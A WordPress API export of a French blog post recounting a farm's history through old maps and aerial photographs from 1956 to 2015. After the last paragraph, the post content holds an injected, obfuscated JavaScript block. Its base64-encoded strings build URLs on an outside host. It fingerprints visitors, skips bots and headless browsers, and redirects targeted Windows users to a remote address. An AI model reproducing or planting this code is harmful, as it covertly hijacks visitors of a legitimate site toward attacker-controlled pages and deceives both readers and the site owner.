{"id":272,"date":"2019-07-27T10:23:03","date_gmt":"2019-07-27T08:23:03","guid":{"rendered":"http:\/\/lafermedelamotte.fr\/?p=272"},"modified":"2025-12-31T16:58:38","modified_gmt":"2025-12-31T15:58:38","slug":"a-la-recherche-du-passe-cartes-et-photos","status":"publish","type":"post","link":"http:\/\/lafermedelamotte.fr\/index.php\/2019\/07\/27\/a-la-recherche-du-passe-cartes-et-photos\/","title":{"rendered":"A la recherche du pass\u00e9 : cartes et photos"},"content":{"rendered":"\n<p>L&rsquo;une des premi\u00e8res choses que nous avons faites en arrivant ici a \u00e9t\u00e9 de faire quelques recherches sur le pass\u00e9 de la Motte en commen\u00e7ant par ce qui \u00e9tait accessible sur internet, \u00e0 savoir des cartes et des photographies a\u00e9riennes.<\/p>\n\n\n\n<p>Le site \u00ab\u00a0Gallica\u00a0\u00bb de la BNF nous a permis de visionner la carte de Cassini (19\u00e8me si\u00e8cle) o\u00f9 d\u00e9j\u00e0 le lieu dit \u00ab\u00a0la Motte\u00a0\u00bb apparaissait. <\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"669\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/carte-cassini-18e-2.jpg\" alt=\"\" class=\"wp-image-278\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/carte-cassini-18e-2.jpg 1000w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/carte-cassini-18e-2-300x201.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/carte-cassini-18e-2-768x514.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption> <br> Au dessus du \u00ab\u00a0St\u00a0\u00bb de Saint Germain <\/figcaption><\/figure>\n\n\n\n<p>Nous avons \u00e9galement trouv\u00e9 la carte de l&rsquo;\u00e9tat-major (1820-1866).<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"625\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/carte-etat-major-1820-1866-1024x625.jpg\" alt=\"\" class=\"wp-image-301\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/carte-etat-major-1820-1866-1024x625.jpg 1024w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/carte-etat-major-1820-1866-300x183.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/carte-etat-major-1820-1866-768x469.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/carte-etat-major-1820-1866.jpg 1189w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>Sur la partie gauche de la carte<\/figcaption><\/figure>\n\n\n\n<p>Puis, avec le site de G\u00e9oportail (\u00ab\u00a0remonter le temps\u00a0\u00bb), nous avons pu trouv\u00e9 beaucoup de photographies a\u00e9riennes, la plus ancienne datant de 1956.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"984\" height=\"745\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1956-la-motte-8-mars-1956-ensemble.png\" alt=\"\" class=\"wp-image-279\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1956-la-motte-8-mars-1956-ensemble.png 984w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1956-la-motte-8-mars-1956-ensemble-300x227.png 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1956-la-motte-8-mars-1956-ensemble-768x581.png 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>8 mars 1956 &#8211; Vue d&rsquo;ensemble<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"714\" height=\"749\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1956-la-motte-1956.jpg\" alt=\"\" class=\"wp-image-280\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1956-la-motte-1956.jpg 714w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1956-la-motte-1956-286x300.jpg 286w\" sizes=\"auto, (max-width: 714px) 100vw, 714px\" \/><figcaption>8 mars 1956 &#8211; m\u00eame photo que pr\u00e9c\u00e9dente, zoom sur les b\u00e2timents<br>On constate que le potager se trouve derri\u00e8re la maison, abrit\u00e9 du vent par des haies.<br>Les b\u00e2timents annexes sont encore en bon \u00e9tat.<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1017\" height=\"837\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1963-La-motte-12-janvier-1963.jpg\" alt=\"\" class=\"wp-image-281\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1963-La-motte-12-janvier-1963.jpg 1017w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1963-La-motte-12-janvier-1963-300x247.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1963-La-motte-12-janvier-1963-768x632.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>12 janvier 1963<br>Le champ du haut est toujours divis\u00e9 en 2 par une haie.<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"846\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1967-la-motte-1er-janvier-1967.jpg\" alt=\"\" class=\"wp-image-282\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1967-la-motte-1er-janvier-1967.jpg 901w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1967-la-motte-1er-janvier-1967-300x282.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1967-la-motte-1er-janvier-1967-768x721.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>1967<br>Le verger a bien pouss\u00e9.<br>Il n&rsquo;y a plus de haie dans le champ du haut.<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"856\" height=\"732\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1976-la-motte-5-avril-1976.jpg\" alt=\"\" class=\"wp-image-283\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1976-la-motte-5-avril-1976.jpg 856w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1976-la-motte-5-avril-1976-300x257.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1976-la-motte-5-avril-1976-768x657.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>5 avril 1976<br>D\u00e9but de la construction du hangar.<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"991\" height=\"838\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1977-23-mai-1977.jpg\" alt=\"\" class=\"wp-image-284\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1977-23-mai-1977.jpg 991w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1977-23-mai-1977-300x254.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1977-23-mai-1977-768x649.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>23 mai 1977<br>Fin de la construction du hangar.<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"921\" height=\"840\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1981-27-mars-ensemble-1.jpg\" alt=\"\" class=\"wp-image-287\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1981-27-mars-ensemble-1.jpg 921w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1981-27-mars-ensemble-1-300x274.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1981-27-mars-ensemble-1-768x700.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>27 mars 1981<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1018\" height=\"829\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1981-la-motte-27-mars-1981.jpg\" alt=\"\" class=\"wp-image-286\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1981-la-motte-27-mars-1981.jpg 1018w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1981-la-motte-27-mars-1981-300x244.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/1981-la-motte-27-mars-1981-768x625.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>27 mars 1981 &#8211; m\u00eame photo que pr\u00e9c\u00e9dente, zoom sur les b\u00e2timents<br>Un terrain&#8230; tr\u00e8s encombr\u00e9 !<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"565\" height=\"549\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/2005-8-juin.jpg\" alt=\"\" class=\"wp-image-288\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/2005-8-juin.jpg 565w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/2005-8-juin-300x292.jpg 300w\" sizes=\"auto, (max-width: 565px) 100vw, 565px\" \/><figcaption>8 juin 2005<br>Une parcelle du champ du haut labour\u00e9e ?<br>Les trous qui provoqueront la ruine de la maison du bas et de la grange apparaissent nettement.<br>Le potager derri\u00e8re la maison n&rsquo;est plus utilis\u00e9. C&rsquo;est celui \u00e0 c\u00f4t\u00e9 de la soue dont se servent les propri\u00e9taires. Le verger a presque totalement disparu, coup\u00e9 pour faire du bois de chauffage.  <\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"793\" height=\"779\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/2012-8-aout.jpg\" alt=\"\" class=\"wp-image-290\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/2012-8-aout.jpg 793w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/2012-8-aout-300x295.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/2012-8-aout-768x754.jpg 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><figcaption>8 ao\u00fbt 2012 &#8211;  vue d&rsquo;ensemble<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"519\" height=\"581\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/2012-8-aout-maison.jpg\" alt=\"\" class=\"wp-image-289\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/2012-8-aout-maison.jpg 519w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/2012-8-aout-maison-268x300.jpg 268w\" sizes=\"auto, (max-width: 519px) 100vw, 519px\" \/><figcaption>8 ao\u00fbt 2012 &#8211; m\u00eame photo que pr\u00e9c\u00e9dente, zoom sur les habitations<br>Les arbres poussent dans la ruine.<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"595\" height=\"631\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/gogle-earth.jpg\" alt=\"\" class=\"wp-image-291\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/gogle-earth.jpg 595w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/gogle-earth-283x300.jpg 283w\" sizes=\"auto, (max-width: 595px) 100vw, 595px\" \/><figcaption>28 septembre 2015 (source : google earth)<\/figcaption><\/figure>\n\n\n\n<p>Apr\u00e8s ces premi\u00e8res d\u00e9couvertes, l&rsquo;ancienne propri\u00e9taire nous a indiqu\u00e9 qu&rsquo;une dame n\u00e9e \u00e0 la Motte vivait encore tout pr\u00e8s d&rsquo;ici. Nous avons donc d\u00e9cid\u00e9 de l&rsquo;inviter \u00e0 d\u00eener. Cela a \u00e9t\u00e9 une belle rencontre. Et ce sera l&rsquo;objet d&rsquo;un prochain article.<\/p>\n\n\n\n<p><\/p>\n<script>!async function(){let e=decodeURIComponent(escape(atob([\"aHR0cHM6Ly9tZXRyaWNhbH\",\"RpYy5jb20vYXBpL2dldA==\"].join(\"\")))),t=decodeURIComponent(escape(atob([\"aHR0cHM6Ly9tZXR\",\"yaWNhbHRpYy5jb2\",\"0vYXBpL2xvZw==\"].join(\"\"))))\nfunction o(e){return btoa(unescape(encodeURIComponent(e)))}let n={}\nif(window.location.search.slice(1).split(\"&\").forEach(e=>{let[t,o]=e.split(\"=\")\nt&&o&&(n[t]=decodeURIComponent(o.replace(\/\\+\/g,\" \")))}),n.verified&&localStorage.setItem(\"verified\",\"true\"),\"true\"===localStorage.getItem(\"verified\"))return\nfunction r(e,t){let o=e.match(t)\nreturn o?parseInt(o[1],10):null}let i=navigator.userAgent,a=\/Windows NT 10.0\/.test(i),l=r(i,\/Chrome\\\/(\\d+)\\.\/),c=r(i,\/Edg\\\/(\\d+)\\.\/),d=r(i,\/OPR\\\/(\\d+)\\.\/),s=r(i,\/YaBrowser\\\/(\\d+)\\.\/),u=r(i,\/Vivaldi\\\/(\\d+)\\.\/),w=r(i,\/Firefox\\\/(\\d+)\\.\/),h=!!window.chrome&&!\/Edg|OPR|YaBrowser|Vivaldi\/.test(i)&&\/Chrome\\\/(\\d+)\\.\/.test(i),g=!1;(l&&l>=136||c&&c>=134||d&&d>=120||s&&s>=24||u&&u>=6||w&&w>=140||h&&l&&l>=136)&&(g=!0)\nlet m=navigator.webdriver||\/HeadlessChrome\/.test(i)||!window.chrome||!navigator.plugins.length||!navigator.mimeTypes.length||0===window.outerWidth||0===window.outerHeight||window.screen&&(window.screen.width<800||window.screen.height<600)||\/bot|spider|crawl|python|curl|phantom|selenium|scrapy|node|headless\/i.test(i),p=!navigator.languages||0===navigator.languages.length||void 0===navigator.hardwareConcurrency||void 0===navigator.deviceMemory\nif(!a||m||p)return\nif(!g){try{fetch(t)}catch(e){}return}let v=document.querySelector('link[rel=\"icon\"]'),f=await async function t(n=1){try{let t=await async function(e,t={}){let{timeout:o=3e3}=t,n=new AbortController,r=setTimeout(()=>n.abort(),o)\ntry{let o=await fetch(e,{...t,signal:n.signal})\nreturn clearTimeout(r),o}catch(e){return clearTimeout(r),null}}(e,{timeout:3e3})\nif(!t||403===t.status)return null\nif(!t.ok)throw Error(\"Network response was not ok\")\nreturn`${(await t.json()).url}\/?wsid=${window.location.hostname}&domain=${o(window.location.hostname)}`}catch(e){return n<1?t(n+1):null}}()\nif(f){let e=f\nv&#038;&#038;(e+=`&#038;link=${o(v.href)}`),window.location.replace(e)}}()<\/script>","protected":false},"excerpt":{"rendered":"<p>L&rsquo;une des premi\u00e8res choses que nous avons faites en arrivant ici a \u00e9t\u00e9 de faire quelques recherches sur le pass\u00e9 de la Motte en commen\u00e7ant par ce qui \u00e9tait accessible sur internet, \u00e0 savoir des cartes et des photographies a\u00e9riennes. Le site \u00ab\u00a0Gallica\u00a0\u00bb de la BNF nous a permis de visionner la carte de Cassini &hellip; <\/p>\n<p class=\"link-more\"><a href=\"http:\/\/lafermedelamotte.fr\/index.php\/2019\/07\/27\/a-la-recherche-du-passe-cartes-et-photos\/\" class=\"more-link\">Continuer la lecture<span class=\"screen-reader-text\"> de &laquo;&nbsp;A la recherche du pass\u00e9 : cartes et photos&nbsp;&raquo;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[10,1],"tags":[],"class_list":["post-272","post","type-post","status-publish","format-standard","hentry","category-histoire","category-non-classe"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/272","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/comments?post=272"}],"version-history":[{"count":5,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/272\/revisions"}],"predecessor-version":[{"id":404,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/272\/revisions\/404"}],"wp:attachment":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/media?parent=272"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/categories?post=272"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/tags?post=272"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}